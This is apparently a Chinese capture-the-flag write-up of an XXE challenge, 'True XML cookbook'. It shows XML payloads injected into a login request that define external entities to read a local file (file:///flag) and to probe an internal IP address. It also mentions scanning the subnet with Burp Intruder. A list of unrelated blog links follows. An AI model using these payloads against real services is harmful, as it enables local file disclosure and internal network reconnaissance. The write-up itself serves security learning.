True XML cookbook

worker..2024-08-26 1:38

打开题目

看到登录口

随便输入admin,123456,然后抓包试一下

先按原来那道题的payload进行测试,payload和结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "file:///flag">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

未成功获取到flag信息,试着探测内网信息,读取下系统内的配置文件信息看是否能发现有用的信息

这里获得一个新的地址,尝试下进行连接结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "http://10.244.80.49/">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

连接失败,那就查询下同网段内存在不存在其他地址,使用bp的爆破模块进行爆破,设置如下:

扫描可得到flag

相关推荐
CS Beginner2 天前
【JavaWeb学习】myabtis.xml一次性加载mapper相关的文件
xml·学习
C嘎嘎嵌入式开发2 天前
(21)100天python从入门到拿捏《XML 数据解析》
xml·开发语言·python
BTU_YC2 天前
DrawIO PPT模板自动生成指南:从文字排版到XML输出的完整工作流
xml·draw.io
源力祁老师3 天前
ODOO数据文件(XML、CSV、SQL)是如何转换并加载到 Odoo 数据库
xml·数据库·sql
爱吃土豆的马铃薯ㅤㅤㅤㅤㅤㅤㅤㅤㅤ4 天前
mapper.xml sql动态表查询配置
xml·java·sql
l1t5 天前
DeepSeek辅助利用搬移底层xml实现快速编辑xlsx文件的python程序
xml·开发语言·python·xlsx
ss2736 天前
手写Spring第4弹: Spring框架进化论:15年技术变迁:从XML配置到响应式编程的演进之路
xml·java·开发语言·后端·spring
Lucky_Turtle7 天前
【Java Xml】dom4j写入XML
xml·java·python
莫陌尛.7 天前
xml方式bean的配置---实例化bean的方式
xml
六元七角八分9 天前
pom.xml
xml·数据库
热门推荐
01BongoCat - 跨平台键盘猫动画工具02GitHub 镜像站点03UV安装并设置国内源04Linux下V2Ray安装配置指南05jdk21下载、安装(Windows、Linux、macOS)06GitLab 零基础入门指南:从安装到项目管理全流程07NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南08KGG转MP3工具|非KGM文件|解密音频09Labelme从安装到标注:零基础完整指南10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)